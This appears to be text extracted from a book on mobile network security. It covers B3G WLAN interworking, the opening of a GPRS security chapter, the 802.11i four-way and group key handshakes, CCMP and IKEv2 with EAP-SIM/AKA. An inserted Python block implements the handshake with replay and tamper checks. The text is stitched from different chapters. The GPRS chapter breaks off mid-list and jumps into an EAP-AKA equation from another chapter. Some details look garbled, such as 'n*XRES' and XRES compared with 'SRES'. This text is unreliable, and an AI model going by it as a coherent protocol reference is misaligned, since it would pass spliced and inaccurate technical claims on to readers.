As mentioned previously, the integrated architecture of B3G networks specifies two different network access scenarios: (1) the WLAN Direct IP Access and (2) the WLAN 3GPP IP Access. The first scenario provides to a user a connection to the public Internet or to an intranet via the WLAN-AN. In this scenario both the user and the network are authenticated to each other using the extensible authentication protocol method for GSM subscriber identity modules (EAP-SIM) (Haverinen & Salowey, 2006) or the Extensible Authentication Protocol-Authentication and Key Agreement (EAP-AKA) (Arkko & Haverinen, 2006) protocol. Moreover, in this scenario the confidentiality and integrity of user data transferred over the air interface is ensured by the 802.11i security framework (IEEE std 802.11i, 2004). On the other hand, the WLAN 3GPP IP Access scenario allows a WLAN user to connect to the PS services (like WAP, MMS, LBS, etc.) or to the public Internet through the 3G PLMN. In this scenario, the user is authenticated to the 3G PLMN using the EAP-SIM or alternatively the EAP-AKA protocol encapsulated within IKEv2 (Kaufman, 2005) messages. The execution of IKEv2 is also used for the establishment of an

Figure 1. The B3G network architecture

Table 1. 3G-WLAN interworking security mechanisms

Security          WLAN Direct IP Access     WLAN 3GPP IP Access
Authentication    EAP-SIM or EAP-AKA        IKEv2 with EAP-SIM or EAP-AKA
Data protection   CCMP or TKIP protocol     IPsec-based VPN tunnel using the ESP protocol

CCMP: Counter Mode CBC-MAC Protocol; TKIP: Temporal Key Integrity Protocol

Access Security in UMTS and IMS

KEY TERMS

Access security: Access security is the mechanism that provides mobile users with secure access to wireless services and protects against attacks on the radio access interface.

General Packet Radio Service (GPRS): GPRS is regarded as a 2.5 generation mobile system. It provides mobile data services to GSM users.

IP multimedia subsystem (IMS): IMS is the component that supports multimedia services in 3G systems.

Third generation (3G): 3G wireless communication systems are standardized to support multimedia services with high data rates.

Universal mobile telecommunications system (UMTS): UMTS is one of the third-generation wireless communication systems.


Chapter XXII
Security in 2.5G Mobile Systems
Christos Xenakis
University of Piraeus, Greece

ABSTRACT

The global system for mobile communications (GSM) is the most popular standard that implements second generation (2G) cellular systems. 2G systems combined with general packet radio services (GPRS) are often described as 2.5G, that is, a technology between the 2G and third generation (3G) of mobile systems. GPRS is a service that provides packet radio access for GSM users. This chapter presents the security architecture employed in 2.5G mobile systems focusing on GPRS. More specifically, the security measures applied to protect the mobile users, the radio access network, the fixed part of the network, and the related data of GPRS are presented and analyzed in detail. This analysis reveals the security weaknesses of the applied measures that may lead to the realization of security attacks by adversaries. These attacks threaten network operation and data transfer through it, compromising end users and network security. To defeat the identified risks, current research activities on GPRS security propose a set of security improvements to the existing GPRS security architecture.

INTRODUCTION

The global system for mobile communications (GSM) is the most popular standard that implements second generation (2G) cellular systems. 2G systems combined with general packet radio services (GPRS) (3GPP TS 03.60, 2002) are often described as 2.5G, that is, a technology between the 2G and third generation (3G) of mobile systems. GPRS is a service that provides packet radio access for GSM users. The GPRS network architecture, which constitutes a migration step toward 3G systems, consists of an overlay network onto the GSM network. In the wireless part, the GPRS technology reserves radio resources only when there is data to be sent, thus ensuring the optimized utilization of radio resources. The fixed part of the network employs the IP technology and is connected to the public Internet. Taking advantage of these features, GPRS enables the provision of a variety of packet-oriented multimedia applications and services to mobile users, realizing the concept of the mobile Internet.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.

For the successful implementation of the new emerging applications and services over GPRS, security is considered as a vital factor. This is because wireless access is inherently less secure and the radio transmission is by nature more susceptible to eavesdropping and fraud in use than wire-line transmission. In addition, users' mobility and the universal access to the network imply higher security risks compared to those encountered in fixed networks. In order to meet security objectives, GPRS uses a specific security architecture, which aims at protecting the network against unauthorized access and the privacy of users. This architecture is mainly based on the security measures applied in GSM, since the GPRS system is built on the GSM infrastructure.

Based on the aforementioned consideration, the majority of the existing literature on security in 2.5G systems refers to GSM (Mitchell, 2001; Pagliusi, 2002). However, GPRS differs from GSM in certain operational and service points, which require a different security analysis. This is because GPRS is based on IP, which is an open and widely deployed technology that presents many vulnerable points. Similarly to IP networks, intruders to the GPRS system may attempt to breach the confidentiality, integrity, or availability, or otherwise attempt to abuse the system in order to compromise services, defraud users, or any part of it. Thus, the GPRS system is more exposed to intruders compared to GSM.

This chapter presents the security architecture employed in 2.5G mobile systems focusing on GPRS. More specifically, the security measures applied to protect the mobile users, the radio access network, the fixed part of the network, and the related data of GPRS are presented and analyzed in detail. This analysis reveals the security weaknesses of the applied measures that may lead to the realization of security attacks by adversaries. These attacks threaten network operation and data transfer through it, compromising end users and network security. To defeat the identified risks, current research activities on GPRS security propose a set of security improvements to the existing GPRS security architecture. The rest of this chapter is organized as follows. The next section describes briefly the GPRS network architecture. The third section presents the security architecture applied to GPRS and the fourth section analyzes its security weaknesses. The fifth section elaborates on the current research activities on GPRS security and the sixth section presents the conclusions.

GPRS NETWORK ARCHITECTURE

The network architecture of GPRS (3GPP TS 03.60, 2002) is presented in Figure 1. A GPRS user owns a mobile station (MS) that provides access to the wireless network. From the network side, the base station subsystem (BSS) is the network part that is responsible for the control of the radio path. The BSS consists of two types of nodes: the base station controller (BSC) and the base transceiver station (BTS). The BTS is responsible for the radio coverage of a given geographical area, while the BSC maintains radio connections towards MSs and terrestrial connections towards the fixed part of the network (core network).

The GPRS core network (CN) uses the network elements of GSM such as the home location register (HLR), the visitor location register (VLR), the authentication centre (AuC) and the equipment identity register (EIR). The HLR is a database used for the management of permanent data of mobile users. The VLR is a database of the service area visited by an MS and contains all the related information required for the MS service handling. The AuC maintains security information related to subscribers' identity, while the EIR maintains information related to mobile equipments' identity. Finally, the mobile service switching centre (MSC) is a network element responsible for circuit-switched services (e.g., voice calls) (3GPP TS 03.60, 2002).

As presented previously, GPRS reuses the majority of the GSM network infrastructure. However, in order to build a packet-oriented mobile network some new network elements (nodes) are required, which handle packet-based traffic. The new class of nodes, called GPRS support nodes (GSN), is responsible for the delivery and routing of data packets between an MS and an external packet data network (PDN). More specifically, a serving

Figure 1. GPRS network architecture [figure not reproduced; it shows the MS, the BSS (BTS, BSC) and the CN (SGSN, GGSN, MSC, VLR, HLR, AuC, EIR), the PSTN, and the Um, Abis, A, Gb, Gn, Gp, Gi, Gc, Gr, Gf, Gd, D, E, F and H interfaces between them]

AuC: Authentication Center; BTS: Base Transceiver Station; BSC: Base Station Controller; BSS: Base Station Subsystem; CN: Core Network; EIR: Equipment Identity Register; GGSN: Gateway GPRS Support Node; HLR: Home Location Register; MS: Mobile Station; MSC: Mobile Switching Center; SGSN: Serving GPRS Support Node; VLR: Visitor Location Register

GSN (SGSN) is responsible for the delivery of data packets from, and to, an MS within its service area. Its tasks include packet routing and transfer, mobility management, logical link management, and authentication and charging functions. A gateway GSN (GGSN) acts as an interface between the GPRS backbone and an external PDN. It converts the GPRS packets coming from the SGSN into the appropriate packet data protocol (PDP) format (e.g., IP), and forwards them to the corresponding PDN. The functionality of the GGSN in the opposite direction is similar. The communication between GSNs (i.e., SGSN and GGSN) is based on IP tunnels through the use of the GPRS tunneling protocol (GTP) (3GPP TS 09.60, 2002).

GPRS SECURITY ARCHITECTURE

In order to meet security objectives, GPRS employs a set of security mechanisms that constitutes the GPRS security architecture. Most of these mechanisms have originally been designed for GSM, but they have been modified to adapt to the packet-oriented traffic nature and the GPRS network components. The GPRS security architecture mainly aims at two goals: (1) to protect the network against unauthorized access, and (2) to protect the privacy of users. It includes the following components (GSM 03.20, 1999):

• Subscriber identity module (SIM)
• Subscriber identity confidentiality
• Subscriber identity authentication


MACuser = HMAC-SHA1_K_auth(EAP-Response/AKA-Challenge(n*XRES)), (6)

• Upon receiving the EAP-Response/AKA-Challenge message, the AAA server verifies the received MACuser value and checks whether the user's response to the challenge (XRES) matches the response (i.e., SRES) received from the HLR/HSS.
• If all these checks are successful, the AAA server sends an EAP-Success message along with the key MSK to the wireless AP. The latter stores the key and forwards the EAP-Success message to the user.

Finalizing the EAP-AKA protocol, both the user and the network have been authenticated to each other, and the user and the wireless AP share the key MSK, which is used in the security framework of 802.11i for generating the session encryption keys, as described in the next section.

Data Protection-802.11i Standard

As mentioned previously, 802.11i is employed to provide confidentiality and integrity services to users' data conveyed over the radio interface of the deployed WLAN in the WLAN Direct IP Access scenario. The 802.11i standard was developed to enhance the security services provided in WLANs. Its design was motivated by the fact that the wired equivalent privacy (WEP) protocol, due to its security flaws, could not fulfil the security requirements of WLANs (Borisov, Goldberg, & Wagner, 2001). The design goal of 802.11i is twofold: (1) to provide session key management by specifying the four-way handshake and group key handshake procedures, and (2) to enhance the confidentiality and integrity services provided to users' data by incorporating two security protocols: (1) the counter-mode/CBC-MAC protocol (CCMP), which employs the advanced encryption standard (AES), and (2) the temporal key integrity protocol (TKIP), which uses the same encryption algorithm (RC4) as the WEP protocol. In the following, we analyze the four-way and group key handshake procedures of 802.11i and we present the functional details of the CCMP protocol. Since the TKIP protocol is considered to be a short term solution and is merely a software enhancement of WEP, we do not elaborate further on it.

Four-way and group key handshakes. After a successful completion of the authentication procedure of EAP-SIM or EAP-AKA, the user and the AP perform the four-way and group key handshakes of 802.11i (IEEE std 802.11i, 2004) in order to generate the session keys. In the four-way handshake, both the user and the AP derive the pairwise transient key (PTK) from the MSK key that was generated in EAP-SIM or EAP-AKA to protect the four-way handshake messages and the unicast messages. In addition, the AP delivers to the user a group temporal key (GTK), which is used to protect broadcast/multicast messages. The GTK key is generated from the group master key (GMK), which is stored and maintained in the AP. The group key handshake is executed whenever the AP wants to deliver a new GTK key to the connected users. Note that all the messages exchanged during the four-way and the group key handshakes comply with the EAPOL-Key message format (IEEE std 802.1X, 2004).

As its name implies, the 802.11i four-way handshake consists of a total of four EAPOL-Key messages, which are analyzed next. Each of these messages includes key information (key_info payload), such as key identity, key replay counter, and so forth.

• At the beginning of the four-way handshake, the AP sends an EAPOL-Key message to the user that includes the Anonce, which is a random number used as input for the generation of the PTK key, as described later on.
• Upon receiving the first EAPOL-Key message, the user generates a new random number called Snonce. Then, he/she calculates the 384-bit PTK key using the first 256 bits of the MSK key (MSK was generated during the authentication procedure of EAP-SIM or EAP-AKA as described in the Authentication in the WLAN Direct IP Access section), the
Figure 4. The CCMP protocol key hierarchy [figure not reproduced: the MSK of EAP-SIM or EAP-AKA is expanded by a prf into the 384-bit PTK, which is split into the 128-bit EAPOL KCK, the 128-bit EAPOL KEK and the 128-bit TK; separately, the GMK is expanded by a prf into the 128-bit GTK]

user's address, the AP's address, the Snonce value, and the Anonce value, as follows:

PTK = prf(MSK, "Pairwise key expansion", Min(AP address, user's address) | Max(AP address, user's address) | Min(Anonce, Snonce) | Max(Anonce, Snonce)), (7)

where prf is a pseudo random function, "Pairwise key expansion" is a fixed string, MSK here denotes the first 256 bits of the MSK (the pairwise master key, PMK, in 802.11i terminology), and, finally, the Min and Max functions provide the minimum and maximum value, respectively, between two inputs. In the sequel, the generated PTK key is partitioned to derive three other keys: (1) a 128-bit key confirmation key (KCK) that provides integrity services to EAPOL-Key messages, (2) a 128-bit key encryption key (KEK) used to encrypt the GTK key as described next, and (3) a 128-bit temporal key (TK) used for user's data encryption (see Figure 4).
• After the calculation of these keys, the user forwards to the AP the second EAPOL-Key message (step 2 in Figure 5) that includes the Snonce, the user's Robust Security Network Information Element (RSN IE) payload, which denotes the set of authentication and cipher algorithms that the user supports, and a message integrity code (MIC), which is a cryptographic digest used to provide integrity services to the messages of the four-way handshake and is computed as follows:

MIC = HASH_KCK(EAPOL-Key message), (8)

where HASH_KCK denotes a keyed hash function (i.e., HMAC-MD5 or HMAC-SHA1-128) that uses the KCK key to generate the cryptographic hash value over the second EAPOL-Key message.
• Upon receiving this message, the AP calculates the key PTK and the related keys (i.e., KCK, KEK, and TK keys), the same as the user, and then verifies the integrity of the message (recomputing the MIC value). Next, it generates the 128-bit GTK key from the GMK key as follows:

GTK = prf(GMK, "Group key expansion" | AP address | Gnonce), (9)
where Gnonce is a random number generated by the AP to derive the GTK key.
• In the sequel, the AP replies to the user by sending the third EAPOL-Key message (step 3), which includes the Anonce value (the same as in the first EAPOL-Key message), an MIC over the third EAPOL-Key message, the AP's RSN IE, and the GTK key, which is used to protect the broadcast/multicast messages and is conveyed encrypted using the KEK key, as follows:

Encrypted GTK = ENC_KEK(GTK), (10)

where ENC_KEK denotes the encryption algorithm (i.e., AES key wrap for CCMP or RC4 for TKIP), which uses the KEK key to encrypt the GTK key.
• On receiving this message, the user checks whether the MIC is valid and compares his/her RSN IE with the AP's RSN IE, ensuring that they support the same cryptographic algorithms (a mismatch indicates that the cipher suite advertised in the unprotected beacon or association frames was tampered with). If all these checks are correct, the user decrypts the GTK key using the KEK key and sends to the AP the last message of the four-way handshake (step 4), which includes an MIC payload over the fourth EAPOL-Key message, to acknowledge to the AP that he/she has installed the PTK key and the related keys (i.e., KEK, KCK, and TK keys), as well as the GTK key.
• Once the AP receives the fourth EAPOL-Key message, it verifies the MIC as previously. If this final check is successful, the four-way handshake is completed successfully, and both the user and the AP share: (1) the TK key to encrypt/decrypt unicast messages, and (2) the GTK key to encrypt/decrypt broadcast/multicast messages.

In case the AP wants to provide a new GTK key to the connected users, it executes the group key handshake, as shown in Figure 5.

Figure 5. The four-way and group key handshakes of 802.11i
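The four-way handshake just described, as an added worked example (editor's code; not code from the chapter, from the IEEE standard, or from any vendor implementation). It implements the PTK derivation of equation (7) from the PMK (the first 256 bits of the MSK) with the 802.11i PRF-384, the EAPOL-Key MIC of equation (8) keyed with the KCK, the replay-counter check carried in the key_info payload, and the RSN IE comparison that catches a cipher-suite downgrade. The KEK-wrapped GTK of message 3 is left out because AES key wrap is not in Python's standard library. The names Supplicant, Authenticator, run_handshake and demo, the simplified frame layout "replay counter | key data | MIC", and all MSK, address, nonce and RSN IE values are assumptions constructed for the example.

```python
# Added example (editor's code, not the chapter's): the 802.11i four-way handshake
# as a two-party exchange in pure Python. Assumptions not taken from the chapter:
# MSK, addresses, nonces and the RSN IE are constructed test values; PTK = PRF-384
# (HMAC-SHA1, counter mode) from the PMK = first 256 bits of the MSK; the EAPOL-Key
# MIC is HMAC-SHA1 truncated to 128 bits (CCMP descriptor case); the EAPOL-Key frame
# is simplified to "replay counter | key data | MIC"; the KEK-wrapped GTK is omitted.
import hashlib
import hmac
import os

MIC_LEN = 16       # 128-bit MIC
NONCE_LEN = 32     # ANonce / SNonce


def prf_384(key, label, data):
    """802.11i PRF-384: HMAC-SHA1(key, label | 0x00 | data | i), i = 0, 1, ..., truncated."""
    out, i = b"", 0
    while len(out) < 48:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:48]


def derive_ptk(msk, ap_addr, sta_addr, anonce, snonce):
    """Equation (7): PTK = prf(PMK, "Pairwise key expansion", Min(AA, SPA) | Max(AA, SPA)
    | Min(ANonce, SNonce) | Max(ANonce, SNonce)), split into KCK | KEK | TK."""
    pmk = msk[:32]                                   # first 256 bits of the MSK
    data = (min(ap_addr, sta_addr) + max(ap_addr, sta_addr)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = prf_384(pmk, b"Pairwise key expansion", data)
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}


def eapol_mic(kck, body):
    """Equation (8): HMAC-SHA1-128 over the EAPOL-Key frame with the MIC field zeroed."""
    return hmac.new(kck, body + bytes(MIC_LEN), hashlib.sha1).digest()[:MIC_LEN]


def eapol_frame(counter, key_data, kck=None):
    """Simplified EAPOL-Key frame; message 1 carries a zero MIC (no PTK exists yet)."""
    body = counter.to_bytes(8, "big") + key_data
    return body + (eapol_mic(kck, body) if kck else bytes(MIC_LEN))


def parse_frame(frame):
    body, tag = frame[:-MIC_LEN], frame[-MIC_LEN:]
    return int.from_bytes(body[:8], "big"), body[8:], body, tag


def mic_ok(kck, body, tag):
    return hmac.compare_digest(eapol_mic(kck, body), tag)


class Supplicant:
    """User side; beacon_rsn_ie is the RSN IE seen in the unprotected beacon."""
    def __init__(self, msk, sta_addr, ap_addr, beacon_rsn_ie):
        self.msk, self.sta, self.ap, self.rsn_ie = msk, sta_addr, ap_addr, beacon_rsn_ie
        self.ptk, self.anonce, self.last_counter, self.installed = None, None, -1, False

    def on_msg1(self, m1):
        counter, anonce, _, _ = parse_frame(m1)
        if counter <= self.last_counter:
            return None                              # replayed or stale message 1
        self.last_counter, self.anonce = counter, anonce
        self.snonce = os.urandom(NONCE_LEN)
        self.ptk = derive_ptk(self.msk, self.ap, self.sta, anonce, self.snonce)
        return eapol_frame(counter, self.snonce + self.rsn_ie, self.ptk["kck"])

    def on_msg3(self, m3):
        counter, key_data, body, tag = parse_frame(m3)
        if counter <= self.last_counter or not mic_ok(self.ptk["kck"], body, tag):
            return None                              # replay, or sender lacks the KCK
        if key_data[:NONCE_LEN] != self.anonce or key_data[NONCE_LEN:] != self.rsn_ie:
            return None                              # ANonce changed or RSN IE downgrade
        self.last_counter, self.installed = counter, True
        return eapol_frame(counter, b"", self.ptk["kck"])


class Authenticator:
    """AP side; assoc_rsn_ie is the RSN IE from the station's (Re)Association Request."""
    def __init__(self, msk, ap_addr, sta_addr, own_rsn_ie, assoc_rsn_ie):
        self.msk, self.ap, self.sta = msk, ap_addr, sta_addr
        self.rsn_ie, self.assoc_rsn_ie = own_rsn_ie, assoc_rsn_ie
        self.anonce, self.counter, self.ptk, self.done = os.urandom(NONCE_LEN), 0, None, False

    def msg1(self):
        self.counter += 1
        return eapol_frame(self.counter, self.anonce)

    def on_msg2(self, m2):
        counter, key_data, body, tag = parse_frame(m2)
        if counter != self.counter or key_data[NONCE_LEN:] != self.assoc_rsn_ie:
            return None                              # wrong replay counter or RSN IE
        ptk = derive_ptk(self.msk, self.ap, self.sta, self.anonce, key_data[:NONCE_LEN])
        if not mic_ok(ptk["kck"], body, tag):
            return None                              # peer does not hold the PMK
        self.ptk = ptk
        self.counter += 1
        return eapol_frame(self.counter, self.anonce + self.rsn_ie, ptk["kck"])

    def on_msg4(self, m4):
        counter, _, body, tag = parse_frame(m4)
        self.done = counter == self.counter and mic_ok(self.ptk["kck"], body, tag)
        return self.done


def run_handshake(msk, ap_addr, sta_addr, rsn_ie, tamper_msg3=False):
    """Drive messages 1-4; returns (completed, ap, sta, m2)."""
    ap = Authenticator(msk, ap_addr, sta_addr, rsn_ie, rsn_ie)
    sta = Supplicant(msk, sta_addr, ap_addr, rsn_ie)
    m2 = sta.on_msg1(ap.msg1())
    m3 = ap.on_msg2(m2)
    if tamper_msg3:                                  # attacker flips a byte of the RSN IE
        i = len(m3) - MIC_LEN - 1
        m3 = m3[:i] + bytes([m3[i] ^ 0x01]) + m3[i + 1:]
    m4 = sta.on_msg3(m3)
    return (m4 is not None and ap.on_msg4(m4)), ap, sta, m2


def demo():
    """Constructed inputs: a 512-bit MSK, two MAC addresses and a CCMP/802.1X RSN IE."""
    msk, aa, spa = bytes(range(64)), bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac010000")
    ok, ap, sta, m2 = run_handshake(msk, aa, spa, rsn_ie)
    bad, _, sta2, _ = run_handshake(msk, aa, spa, rsn_ie, tamper_msg3=True)
    n1, n2 = bytes(NONCE_LEN), bytes([7]) * NONCE_LEN
    return {"completed": ok and ap.done and sta.installed,
            "keys_match": ap.ptk == sta.ptk and len(ap.ptk["tk"]) == 16,
            "replay_rejected": ap.on_msg2(m2) is None,
            "tamper_rejected": (not bad) and not sta2.installed,
            "ptk_symmetric": derive_ptk(msk, aa, spa, n1, n2) == derive_ptk(msk, spa, aa, n2, n1)}


if __name__ == "__main__":
    print(demo())
```

Running the block prints the five checks of demo(): a clean run completes with identical KCK/KEK/TK on both sides, a replayed message 2 is refused because its replay counter no longer matches the AP's current value, and a message 3 whose RSN IE was altered fails the KCK-keyed MIC, so the supplicant never installs keys. The Min/Max ordering in derive_ptk is what lets both parties compute the same PTK regardless of which address or nonce they consider "theirs".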
Figure 6. The CCMP protocol

• The AP first generates a fresh GTK key from the GMK key and sends an EAPOL-Key message that includes an MIC value and the new GTK key to the users. Note that the MIC is computed over the body of this EAPOL-Key message using the KCK key, and the GTK key is conveyed encrypted using the KEK key. Recall that both the user and the AP share the KEK and KCK keys, which were generated in the four-way handshake.
• Upon receiving the previous message, the user employs the KCK key to verify whether the MIC is valid and then decrypts the GTK key using the KEK key. Finally, he/she replies to the AP with an EAPOL-Key message, which includes an MIC that acknowledges to the AP that he/she has installed the GTK key.
• Once the AP receives this message, it verifies the MIC. If this final verification is successful, then the group key handshake is completed successfully and the user can decrypt the broadcast/multicast messages sent by the AP using the new GTK key.

CCMP Protocol. 802.11i incorporates the CCMP protocol to provide confidentiality and integrity services to users' data conveyed over the radio interface of WLANs. The CCMP protocol combines the AES encryption algorithm in counter mode (CTR-AES) to provide data confidentiality and the Cipher Block Chaining Message Authentication Code (CBC-MAC) to compute an MIC over the transmitted user's data that provides message integrity (Whiting, Housley, & Ferguson, 2003).

The operation of the CCMP protocol can be divided into three distinct phases. In phase 1, the CCMP protocol constructs an additional authentication data (AAD) value from the constant fields of the 802.11 frame header (IEEE std 802.11, 1999). In addition, it creates a nonce value from the priority field of the 802.11 frame header, the transmitter address, and the packet number (PN) parameter, which is a 48-bit counter incremented for each 802.11i protected frame. In phase 2, the CCMP protocol computes an MIC value over the 802.11 frame header, the AAD, the nonce, and the 802.11 frame payload using the CBC-MAC algorithm and the TK key (or the GTK key for broadcast/multicast
communication). Recall that the TK key is part of the PTK key that is generated in the four-way handshake. In the sequel, CCMP forms the cipher text of the 802.11 frame payload and the produced MIC, using the CTR-AES encryption algorithm and the TK key (or the GTK key). Finally, in phase 3, the CCMP protocol constructs the 802.11i frame from the concatenation of: (1) the 802.11 header, (2) the CCMP header, which is created from the PN parameter and the identity of the encryption key, (3) the cipher text, and (4) the 802.11 trailer, which is the frame check sequence (FCS) (see Figure 6). The receiver of the 802.11i frame must verify that the PN parameter is fresh (i.e., larger than the last PN accepted under that key, which is what defeats replayed frames) and, after decrypting the payload with the TK key (or the GTK key), that the MIC value is valid; a frame that fails either check is discarded.

WLAN 3GPP IP Access

In contrast to the WLAN Direct IP Access scenario, in which a user gets access to the public Internet directly through the WLAN-AN, the WLAN 3GPP IP Access scenario provides to the WLAN user access to the PS services or the Internet through the 3G PLMN. Before getting access to them, the user must perform the six (6) discrete steps, presented in Figure 7 and described as follows:

1. Initial authentication. The user and the network are authenticated to each other using either the EAP-SIM or EAP-AKA protocol. This authentication step enables the user to obtain a local IP address, called transport IP address, which is used for access to the WLAN environment and the PDG. Note that this initial authentication can be omitted if the PDG trusts the WLAN network and its users.

Figure 7. 3GPP IP access authentication procedure
Figure 8. 3GPP IP access authentication protocol stack

2. After the EAP-SIM or EAP-AKA execution, the four-way handshake and optionally the group key handshake follow to provide the 802.11i session keys. Then, the communication between the user and the wireless AP is encrypted using the CCMP or alternatively the TKIP protocol.
3. After the completion of the initial authentication step and the 802.11i handshakes, the user communicates with the Dynamic Host Configuration Protocol (DHCP) server to obtain the transport IP address. This local address is used by the user to execute IKEv2 in step 5.
4. The user retrieves the IP address of the PDG using the W-APN identity and the domain name system (DNS) protocol. Thus, both the user and the PDG can participate in a second authentication step that combines IKEv2 and EAP-SIM or EAP-AKA.
5. Second authentication. The user and the PDG execute the IKEv2 negotiation protocol, which encapsulates either EAP-SIM or EAP-AKA for authentication of the negotiating peers. After authentication completion, the user obtains a global IP address, called remote IP address, which is used for access to the PS services and the public Internet via the 3G PLMN. In addition, the execution of IKEv2 results in the establishment of a pair of IPsec security associations (SAs) between the user and the PDG, which are used for the deployment of an IPsec-based VPN.
6. The deployed IPsec-based VPN protects user's data exchanged between the user and the PDG (in both directions), ensuring data origin authentication, data confidentiality and message integrity.

Figure 8 presents the protocol stack used in the 3GPP IP Access scenario for each entity that participates in the authentication procedure. The main authentication protocol is EAP-SIM or EAP-AKA, which is executed between the user and the AAA server. The user encapsulates EAP-SIM or EAP-AKA messages within IKEv2 and conveys them to the PDG. The latter, acting as an AAA client, transfers the EAP-SIM or EAP-AKA messages to the AAA server using an AAA protocol. Note that the AAA protocol can be either RADIUS, which runs over the user datagram protocol (UDP), or Diameter, which typically runs over TCP. The AAA server also includes the mobile application part (MAP) protocol stack to be able to communicate with the HSS/HLR and obtain authentication vectors (GSM triplets or 3G quintets) and authorization information.

From the previous steps that a user has to perform to get access to the PS services or the public Internet in the WLAN 3GPP IP Access scenario, the initial authentication using either EAP-SIM or EAP-AKA (step 1) and the 802.11i handshakes (step 2) are the same as those of the WLAN Direct IP Access scenario, which have been analyzed in
the Authentication in the WLAN Direct IP Access and Data Protection-802.11i Standard sections. Moreover, the acquisition of a local IP address (step 3) and the retrieval of the PDG address (step 4) do not present any significant interest from a security point of view. Thus, in the following sections we analyze the second authentication step (step 5), which includes a combined execution of IKEv2 with EAP-SIM or EAP-AKA, and the deployment of a bidirectional VPN that protects the data exchanged.

Authentication in WLAN 3GPP IP Access

IKEv2 (Kaufman, 2005) is a simplified redesign of IKE (Harkins & Carrel, 1998) that allows two peers to authenticate each other (i.e., mutual authentication) and derive keys for secure communication with IPsec. The exchanged messages within IKEv2 are protected, ensuring confidentiality and integrity, while the peers are authenticated using certificates, pre-shared keys, or the EAP protocol. In the context of the WLAN 3GPP IP Access scenario, the user and the PDG execute IKEv2. The authentication of the user is based on EAP-SIM or EAP-AKA, while the authentication of the PDG is based on certificates.

Figure 9. The execution of IKEv2 based on EAP-SIM or EAP-AKA

The IKEv2 protocol is executed in two sequential phases (i.e., phase 1 and phase 2). In phase 1, the user and the PDG establish two distinct SAs: (1) a bidirectional IKE_SA that protects the messages of phase 2, and (2) an IPsec_SA (in practice a pair of one-way SAs, one per direction) that protects user's data. During phase 2, the user and the PDG, using the established IKE_SA, can securely negotiate a second IPsec_SA that is employed for the establishment of a bidirectional IPsec-based VPN tunnel between them.

The IKEv2 phase 1 negotiation between the user and the PDG is executed in two sub-phases: (1) the IKE_SA_INIT, and (2) the IKE_AUTH exchange, as shown in Figure 9. The IKE_SA_INIT exchange (noted as step 1 in Figure 9) consists of a single request and reply message pair, which negotiates cryptographic algorithms, exchanges nonces, and performs a Diffie-Hellman exchange. In the context of this sub-phase, four cryptographic algorithms are negotiated: (1) an encryption algorithm, (2) an integrity protection algorithm, (3) a Diffie-Hellman group, and (4) a prf. The latter prf is employed for the construction of keying material for all of the cryptographic algorithms used. After the execution of the IKE_SA_INIT, an IKE_SA is established that protects the IKE_AUTH exchange. The second sub-phase (i.e., IKE_AUTH) authenticates the previous messages; exchanges identities and certificates; encapsulates EAP-SIM or alternatively EAP-AKA messages; and establishes an IPsec_SA (steps 2-5 in Figure 9). All the messages of IKEv2 include a header payload (HDR), which contains a security parameter index (SPI), a version number, and security-related flags. The SPI is a value chosen by the user and the PDG to identify a unique SA. In the following, the IKEv2 negotiation is analyzed:

• At the beginning of the IKEv2 negotiation (step 1 in Figure 9), the user sends to the PDG the SAi1, which denotes the set of cryptographic algorithms for the IKE_SA that he/she supports, the KEi that is the Diffie-Hellman value, and an Ni value that represents the nonce. The nonce (i.e., a random number of at least 128 bits) is used as input to the cryptographic functions employed by IKEv2 to ensure liveness of the keying material and protect against replay attacks.
• The PDG answers with a message that contains its choice from the set of cryptographic algorithms for the IKE SA (SAr1), its value to complete the Diffie-Hellman exchange (KEr) and its nonce (Nr). At this point, both the user and the PDG can calculate the SKEYSEED value as follows:

SKEYSEED = prf((Ni | Nr), g^ir), (11)

where prf is the pseudo random function negotiated in the previous messages, and g^ir is the shared secret key that derives from the Diffie-Hellman exchange. The SKEYSEED value is used to calculate various secret keys. The most important are: the SK_d used for providing the keying material for the IPsec SA; SK_ei and SK_ai used for encrypting and providing integrity services, respectively, to the IKEv2 messages from the user to the PDG (IKE_SA); and, finally, SK_er and SK_ar that provide security services in the opposite direction (IKE_SA).

Finalizing the IKE_SA_INIT exchange, the IKE_AUTH exchange can start. It is worth noting that from this point all the payloads of the following IKEv2 messages, excluding the message header (HDR payload), are encrypted and integrity protected using the IKE_SA (see step 2 in Figure 9).

• The IKE_AUTH exchange of messages starts when the user sends to the PDG a message that includes his/her identity (IDi), which could be in an NAI format, the CERTREQ payload (optionally), which is a list of the certificate authorities (CA) whose public keys the user trusts, and the traffic selectors (TSi and TSr), which allow the peers to identify
Security Architectures for B3G Mobile Networks

the packet flows that require processing by IPsec. In addition, in the same message the user must include the Configuration Payload Request (CP-Request), which is used to obtain a remote IP address from the PDG and get access to the 3G-PLMN.
• After receiving this information, the PDG forwards to the AAA server the user identity (IDi), including a parameter which indicates that the authentication is being performed for VPN (tunnel) establishment. This allows the AAA server to distinguish between authentications for WLAN access and authentications for VPN setup.
• Upon receiving the IDi, the AAA server fetches the user's profile and authentication credentials (GSM triplets if authentication is based on EAP-SIM, or 3G authentication vectors if authentication is based on EAP-AKA) from the HSS/HLR, if these are not already available in the AAA server.
• Based on the user's profile, the AAA server initiates an EAP-AKA (if the user possesses a USIM card) or an EAP-SIM authentication (if the user possesses a GSM/GPRS SIM card) by sending to the PDG the first message of the related procedure (i.e., EAP-SIM or EAP-AKA), carried in an AAA protocol (i.e., RADIUS or Diameter) (step 3 in Figure 9). Since there is no functional difference between EAP-SIM and EAP-AKA when these protocols are encapsulated in IKEv2, we present them in a generic way and introduce the EAP-AKA (SIM) payload notation (see Figure 9) to indicate that this payload can be either an EAP-SIM or an EAP-AKA message.
• Upon receiving the first EAP-AKA (SIM) message, the PDG encapsulates it within an IKEv2 message and forwards the encapsulated message to the user. Besides the EAP-AKA (SIM) payload, this message also includes the PDG's identity, which identifies the provided 3G services (W-APN) (see the Background section), the PDG's certificate (CERT), and the AUTHr field. The latter contains signed data used by the user to authenticate the PDG. Similarly to the previous messages, the payload of this IKEv2 message, except for the message header, is encrypted using the IKE_SA.
